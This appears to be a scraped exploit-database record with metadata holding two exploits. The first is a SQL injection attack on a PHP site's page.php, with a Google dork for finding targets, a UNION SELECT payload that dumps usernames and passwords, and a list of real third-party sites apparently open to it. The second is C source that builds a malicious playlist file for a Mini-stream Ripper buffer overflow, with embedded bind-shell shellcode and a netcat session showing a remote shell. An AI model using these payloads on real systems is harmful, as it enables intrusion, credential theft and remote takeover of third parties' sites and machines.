ID 1337DAY-ID-16702
Type zdt
Reporter Angel Injection
Modified 2011-08-17T00:00:00
Description
Exploit for php platform in category web applications
# Exploit Title:Precision Technologies(page.php)sql Injection Vulnerability
# Date: 17/8/2011
# Author: Angel Injection
# home Page: http://www.club-h.co.cc , http://www.sec-krb.org
# Email: Angel-Injection[at]hotmail.com
# Vendor or Software Link: http://www.pretechno.com
# Version: N/A
# Category:: webapps
# Google dork: intext:"powered by Precision Technologies" inurl:"page.php?id="
# Tested on: Back Track 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Exploit
http://localhost/page.php?id=1'
http://localhost/page.php?id=1[injection here]
http://www.localhost/page.php?id=-1+union+select+1,2,3,concat(uid,0x3a,username,0x3a,password),5,6,7,8,9,10+from+auth_user--
Demo sites
http://www.cibmrd.com/page.php?id=%27
http://www.nirmaltours.com/page.php?id=1%27
http://prakritiwomen.org/page.php?id=1
http://www.cardicareaipc.com/page.php?id=1%27
http://www.opaquegroup.com/page.php?id=1%27
http://synergy-pune.com/page.php?id=1%27
-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Thanks to all the people of Iraq And Club Hack Team
# 0day.today [2018-01-02] #
{"hash": "13e75e3e44f57cd40c9c5b2a0fc7ccd7e0b4e767061ab04d5038d3f6cc13f381", "id": "1337DAY-ID-16702", "lastseen": "2018-01-02T15:11:11", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "690d9db3ae63ffd6f45bb4e90e40feb8", "key": "href"}, {"hash": "0dfedf84e8a9988b87a4e7ecb8b9d410", "key": "modified"}, {"hash": "0dfedf84e8a9988b87a4e7ecb8b9d410", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "063fd817357f541bf662443325af39b8", "key": "reporter"}, {"hash": "7f5f6d74696e9cc21c02036b57303215", "key": "sourceData"}, {"hash": "e9803e767123e6c725d382e25aa6d5a0", "key": "sourceHref"}, {"hash": "e59a9991323c7e74eb5d2d1e4f2d2002", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/16702", "description": "Exploit for php platform in category web applications", "title": "Precision Technologies(page.php)sql Injection Vulnerability", "history": [{"bulletin": {"hash": "78a78cdc42a988cbfffed21d80031987b91ad3d9326d5dfb19e69f15a843adeb", "id": "1337DAY-ID-16702", "lastseen": "2016-04-19T01:43:21", "enchantments": {"score": {"value": 6.4, "modified": "2016-04-19T01:43:21"}}, "hashmap": [{"hash": "d19f3922d236744324f3e986d7f25e30", "key": "href"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "c12021b2e1bbd351fb41d3e36c09c84e", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e59a9991323c7e74eb5d2d1e4f2d2002", "key": "title"}, {"hash": "063fd817357f541bf662443325af39b8", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "0dfedf84e8a9988b87a4e7ecb8b9d410", "key": "modified"}, {"hash": "0dfedf84e8a9988b87a4e7ecb8b9d410", "key": "published"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "a880f11e2ef82d7191d49e77f81d07fa", "key": "sourceHref"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/16702", "description": "Exploit for php platform in category web applications", "viewCount": 0, "title": "Precision Technologies(page.php)sql Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "# Exploit Title:Precision Technologies(page.php)sql Injection Vulnerability\r\n# Date: 17/8/2011\r\n# Author: Angel Injection\r\n# home Page: http://www.club-h.co.cc , http://www.sec-krb.org\r\n# Email: Angel-Injection[at]hotmail.com\r\n# Vendor or Software Link: http://www.pretechno.com\r\n# Version: N/A\r\n# Category:: webapps\r\n# Google dork: intext:\"powered by Precision Technologies\" inurl:\"page.php?id=\"\r\n# Tested on: Back Track 5\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\nExploit\r\n\r\nhttp://localhost/page.php?id=1'\r\n\r\nhttp://localhost/page.php?id=1[injection here]\r\n\r\nhttp://www.localhost/page.php?id=-1+union+select+1,2,3,concat(uid,0x3a,username,0x3a,password),5,6,7,8,9,10+from+auth_user--\r\n\r\nDemo sites\r\nhttp://www.cibmrd.com/page.php?id=%27\r\nhttp://www.nirmaltours.com/page.php?id=1%27\r\nhttp://prakritiwomen.org/page.php?id=1\r\nhttp://www.cardicareaipc.com/page.php?id=1%27\r\nhttp://www.opaquegroup.com/page.php?id=1%27\r\nhttp://synergy-pune.com/page.php?id=1%27\r\n\r\n\r\n-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----\r\nThanks to all the people of Iraq And Club Hack Team\r\n\r\n\n\n# 0day.today [2016-04-19] #", "published": "2011-08-17T00:00:00", "references": [], "reporter": "Angel Injection", "modified": "2011-08-17T00:00:00", "href": "http://0day.today/exploit/description/16702"}, "lastseen": "2016-04-19T01:43:21", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "# Exploit Title:Precision Technologies(page.php)sql Injection Vulnerability\r\n# Date: 17/8/2011\r\n# Author: Angel Injection\r\n# home Page: http://www.club-h.co.cc , http://www.sec-krb.org\r\n# Email: Angel-Injection[at]hotmail.com\r\n# Vendor or Software Link: http://www.pretechno.com\r\n# Version: N/A\r\n# Category:: webapps\r\n# Google dork: intext:\"powered by Precision Technologies\" inurl:\"page.php?id=\"\r\n# Tested on: Back Track 5\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\nExploit\r\n\r\nhttp://localhost/page.php?id=1'\r\n\r\nhttp://localhost/page.php?id=1[injection here]\r\n\r\nhttp://www.localhost/page.php?id=-1+union+select+1,2,3,concat(uid,0x3a,username,0x3a,password),5,6,7,8,9,10+from+auth_user--\r\n\r\nDemo sites\r\nhttp://www.cibmrd.com/page.php?id=%27\r\nhttp://www.nirmaltours.com/page.php?id=1%27\r\nhttp://prakritiwomen.org/page.php?id=1\r\nhttp://www.cardicareaipc.com/page.php?id=1%27\r\nhttp://www.opaquegroup.com/page.php?id=1%27\r\nhttp://synergy-pune.com/page.php?id=1%27\r\n\r\n\r\n-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----\r\nThanks to all the people of Iraq And Club Hack Team\r\n\r\n\n\n# 0day.today [2018-01-02] #", "published": "2011-08-17T00:00:00", "references": [], "reporter": "Angel Injection", "modified": "2011-08-17T00:00:00", "href": "https://0day.today/exploit/description/16702"}
{"result": {"zdt": [{"lastseen": "2018-02-06T01:26:46", "references": [], "description": "Exploit for unknown platform in category local exploits", "edition": 2, "reporter": "mr_me", "published": "2009-12-27T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "zdt", "title": "Mini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow", "bulletinFamily": "exploit", "cvelist": [], "modified": "2009-12-27T00:00:00", "id": "1337DAY-ID-8215", "href": "https://0day.today/exploit/description/8215", "sourceData": "============================================================================\r\nMini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow Exploit\r\n============================================================================\r\n\r\n\r\n\r\n# Title: Mini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow Exploit\r\n# CVE-ID: ()\r\n# OSVDB-ID: ()\r\n# Author: mr_me\r\n# Published: 2009-12-27\r\n# Verified: yes\r\n\r\nview source\r\nprint?\r\n/*\r\n \r\nriptheministreamripper.c\r\n \r\nMini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow Exploit\r\nexploited by: mr_me\r\nGreetz to the Corlan Security Team: corelanc0d3r, rick, edi, dellnull, marko T, phifli, corelanc0d3r\r\nVisit: corelanc0d3r's blog http://www.corelan.be:8800/\r\nreference: http://www.exploit-db.com/exploits/10646\r\nDownload: http://mini-stream.net/\r\nTested on: Windows XP sp3\r\n \r\nNote: *** For educational purposes only ***\r\n \r\nusage:\r\nCompile and execute to create the .pls file and upload it to your favourite server.\r\nThen click on 'LOAD' and then 'URL'. Enter the evil URL, BAM you win.\r\n \r\n[email\u00a0protected]:~$ nc -v 192.168.2.5 4444\r\n192.168.2.5: inverse host lookup failed: Unknown server error : Connection timed out\r\n(UNKNOWN) [192.168.2.5] 4444 (?) open\r\nMicrosoft Windows XP [Version 5.1.2600]\r\n(C) Copyright 1985-2001 Microsoft Corp.\r\n \r\nC:\\Program Files\\Mini-stream\\Mini-stream Ripper>\r\n \r\nI hope everyone had a Merry Christmas! and soon to have a Happy New Year!\r\n \r\n*/\r\n \r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n \r\n/* win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum\r\n http://metasploit.com */\r\n \r\nunsigned char shell[] =\r\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\"\r\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"\r\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"\r\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\"\r\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4c\\x36\\x4b\\x4e\"\r\n\"\\x4f\\x44\\x4a\\x4e\\x49\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x42\\x56\\x4b\\x58\"\r\n\"\\x4e\\x56\\x46\\x32\\x46\\x32\\x4b\\x38\\x45\\x44\\x4e\\x43\\x4b\\x58\\x4e\\x47\"\r\n\"\\x45\\x50\\x4a\\x57\\x41\\x50\\x4f\\x4e\\x4b\\x38\\x4f\\x34\\x4a\\x41\\x4b\\x58\"\r\n\"\\x4f\\x55\\x42\\x52\\x41\\x30\\x4b\\x4e\\x43\\x4e\\x42\\x53\\x49\\x54\\x4b\\x38\"\r\n\"\\x46\\x53\\x4b\\x58\\x41\\x30\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x39\\x4e\\x4a\"\r\n\"\\x46\\x58\\x42\\x4c\\x46\\x57\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x30\"\r\n\"\\x44\\x4c\\x4b\\x4e\\x46\\x4f\\x4b\\x33\\x46\\x55\\x46\\x42\\x4a\\x42\\x45\\x57\"\r\n\"\\x43\\x4e\\x4b\\x58\\x4f\\x55\\x46\\x52\\x41\\x50\\x4b\\x4e\\x48\\x36\\x4b\\x58\"\r\n\"\\x4e\\x50\\x4b\\x34\\x4b\\x48\\x4f\\x55\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x43\\x30\"\r\n\"\\x4e\\x52\\x4b\\x48\\x49\\x38\\x4e\\x36\\x46\\x42\\x4e\\x41\\x41\\x56\\x43\\x4c\"\r\n\"\\x41\\x43\\x42\\x4c\\x46\\x46\\x4b\\x48\\x42\\x54\\x42\\x33\\x4b\\x58\\x42\\x44\"\r\n\"\\x4e\\x50\\x4b\\x38\\x42\\x47\\x4e\\x41\\x4d\\x4a\\x4b\\x48\\x42\\x54\\x4a\\x50\"\r\n\"\\x50\\x35\\x4a\\x46\\x50\\x58\\x50\\x44\\x50\\x50\\x4e\\x4e\\x42\\x35\\x4f\\x4f\"\r\n\"\\x48\\x4d\\x41\\x53\\x4b\\x4d\\x48\\x36\\x43\\x55\\x48\\x56\\x4a\\x36\\x43\\x33\"\r\n\"\\x44\\x33\\x4a\\x56\\x47\\x47\\x43\\x47\\x44\\x33\\x4f\\x55\\x46\\x55\\x4f\\x4f\"\r\n\"\\x42\\x4d\\x4a\\x56\\x4b\\x4c\\x4d\\x4e\\x4e\\x4f\\x4b\\x53\\x42\\x45\\x4f\\x4f\"\r\n\"\\x48\\x4d\\x4f\\x35\\x49\\x48\\x45\\x4e\\x48\\x56\\x41\\x48\\x4d\\x4e\\x4a\\x50\"\r\n\"\\x44\\x30\\x45\\x55\\x4c\\x46\\x44\\x50\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x49\\x4d\"\r\n\"\\x49\\x50\\x45\\x4f\\x4d\\x4a\\x47\\x55\\x4f\\x4f\\x48\\x4d\\x43\\x45\\x43\\x45\"\r\n\"\\x43\\x55\\x43\\x55\\x43\\x45\\x43\\x34\\x43\\x45\\x43\\x34\\x43\\x35\\x4f\\x4f\"\r\n\"\\x42\\x4d\\x48\\x56\\x4a\\x56\\x41\\x41\\x4e\\x35\\x48\\x36\\x43\\x35\\x49\\x38\"\r\n\"\\x41\\x4e\\x45\\x49\\x4a\\x46\\x46\\x4a\\x4c\\x51\\x42\\x57\\x47\\x4c\\x47\\x55\"\r\n\"\\x4f\\x4f\\x48\\x4d\\x4c\\x36\\x42\\x31\\x41\\x45\\x45\\x35\\x4f\\x4f\\x42\\x4d\"\r\n\"\\x4a\\x36\\x46\\x4a\\x4d\\x4a\\x50\\x42\\x49\\x4e\\x47\\x55\\x4f\\x4f\\x48\\x4d\"\r\n\"\\x43\\x35\\x45\\x35\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x45\\x4e\\x49\\x44\\x48\\x38\"\r\n\"\\x49\\x54\\x47\\x55\\x4f\\x4f\\x48\\x4d\\x42\\x55\\x46\\x35\\x46\\x45\\x45\\x35\"\r\n\"\\x4f\\x4f\\x42\\x4d\\x43\\x49\\x4a\\x56\\x47\\x4e\\x49\\x37\\x48\\x4c\\x49\\x37\"\r\n\"\\x47\\x45\\x4f\\x4f\\x48\\x4d\\x45\\x55\\x4f\\x4f\\x42\\x4d\\x48\\x36\\x4c\\x56\"\r\n\"\\x46\\x46\\x48\\x36\\x4a\\x46\\x43\\x56\\x4d\\x56\\x49\\x38\\x45\\x4e\\x4c\\x56\"\r\n\"\\x42\\x55\\x49\\x55\\x49\\x52\\x4e\\x4c\\x49\\x48\\x47\\x4e\\x4c\\x36\\x46\\x54\"\r\n\"\\x49\\x58\\x44\\x4e\\x41\\x43\\x42\\x4c\\x43\\x4f\\x4c\\x4a\\x50\\x4f\\x44\\x54\"\r\n\"\\x4d\\x32\\x50\\x4f\\x44\\x54\\x4e\\x52\\x43\\x49\\x4d\\x58\\x4c\\x47\\x4a\\x53\"\r\n\"\\x4b\\x4a\\x4b\\x4a\\x4b\\x4a\\x4a\\x46\\x44\\x57\\x50\\x4f\\x43\\x4b\\x48\\x51\"\r\n\"\\x4f\\x4f\\x45\\x57\\x46\\x54\\x4f\\x4f\\x48\\x4d\\x4b\\x45\\x47\\x35\\x44\\x35\"\r\n\"\\x41\\x35\\x41\\x55\\x41\\x35\\x4c\\x46\\x41\\x50\\x41\\x35\\x41\\x45\\x45\\x35\"\r\n\"\\x41\\x45\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x4d\\x4a\\x49\\x4d\\x45\\x30\\x50\\x4c\"\r\n\"\\x43\\x35\\x4f\\x4f\\x48\\x4d\\x4c\\x56\\x4f\\x4f\\x4f\\x4f\\x47\\x33\\x4f\\x4f\"\r\n\"\\x42\\x4d\\x4b\\x58\\x47\\x45\\x4e\\x4f\\x43\\x38\\x46\\x4c\\x46\\x36\\x4f\\x4f\"\r\n\"\\x48\\x4d\\x44\\x55\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x4f\\x4e\\x50\\x4c\\x42\\x4e\"\r\n\"\\x42\\x36\\x43\\x55\\x4f\\x4f\\x48\\x4d\\x4f\\x4f\\x42\\x4d\\x5a\";\r\n \r\nint main ( int argc , char * argv[])\r\n{\r\n FILE* expfle= NULL;\r\n char* EIP = \"\\x53\\x93\\x42\\x7e\"; // jmp esp -> user32.dll\r\n int i;\r\n \r\n printf(\"\\t. .. ... Mini-stream Ripper (.pls) Stack buffer Overflow Exploit ... .. .\\r\\n\");\r\n printf(\"\\t -------> now upload the .pls file to a remote server <-------\\n\");\r\n \r\n \r\n if( (expfle=fopen(\"mini-stream-ripper.pls\",\"wb\")) ==NULL )\r\n {\r\n perror(\"Cannot create the exploit file!!! :(\");\r\n exit(0);\r\n }\r\n \r\n for (i=0; i<17405; i++)\r\n {\r\n fwrite(\"\\x41\", 1, 1, expfle); // Junk\r\n }\r\n \r\n fwrite(EIP, 4, 1, expfle); // ret\r\n \r\n for (i=0; i<10; i++)\r\n {\r\n fwrite(\"\\x90\", 1, 1, expfle); // Nop's\r\n }\r\n \r\n fwrite(shell, sizeof(shell), 1, expfle); // write the shell\r\n \r\n for (i=0; i<16702; i++)\r\n {\r\n fwrite(\"\\xcc\", 1, 1, expfle); // finish off buffer\r\n }\r\n \r\n fclose(expfle);\r\n \r\n printf(\"[+] mini-stream-ripper.pls Created successfully! \\r\\n\");\r\n printf(\"[+] Exploited by mr_me \\r\\n\");\r\n \r\n return 0;\r\n \r\n}\r\n\r\n\r\n\r\n\n# 0day.today [2018-02-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8215"}]}}
